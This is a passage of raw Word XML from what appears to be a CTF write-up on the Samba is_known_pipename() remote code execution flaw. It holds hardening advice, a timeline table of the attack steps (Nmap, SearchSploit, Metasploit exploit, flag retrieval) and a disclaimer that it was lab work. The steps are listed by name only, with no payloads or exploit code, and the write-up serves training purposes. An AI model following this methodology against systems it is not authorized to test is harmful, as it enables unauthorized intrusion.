          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Run Samba under a dedicated, unprivileged service account rather than root, so a future RCE does not translate directly into full host compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Restrict network exposure: SMB (139/445) should not be reachable from untrusted networks; place it behind a firewall or VPN.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable anonymous FTP login unless explicitly required, and audit all other exposed services (FTP, MySQL, secondary HTTP on 12380) found during recon, as this host exposed an unusually large attack surface for a single machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E2761" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E2761"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Timeline Summary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2960"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="90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Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="560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Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Full port/service scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="56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Version-based exploit lookup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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SearchSploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploit module identification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Metasploit (search)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="56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Target configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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Metasploit (set RHOST/RPORT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Metasploit (exploit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="56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Privilege confirmation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag retrieval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">cat flag.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="400"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B1F27"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Disclaimer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5A5F6B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">This engagement was performed against a designated lab/CTF target for educational purposes. The techniques described here should only be used against systems you own or are explicitly authorized to test.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F6B"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5A5F6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5F6B"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve">CTF Writeup — Samba is_known_pipename() RCE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1b48155747a037c1d0e00bfaf49892d8e5469b7.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/ab667446ba2cf61a56a5ce5b16bb729109e55acc.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/fdbea83c1a1d8ba695bcdc4574867650240f226c.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/99b2113707b4676dde80cd026f5ee658ba0368e1.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/25c0254529b8d67ea15df03c92a20e5cab3caaa1.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/cf2bdef9655aaf57c56bb38d59520c361de3b984.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/f3a6cb58714d6d4815516934c2a02163fbe19e15.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/5855b15f73cef2fb761da476deb3f4a155dfe67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2026-09-19T14:03:41.043Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-19T14:03:41.043Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>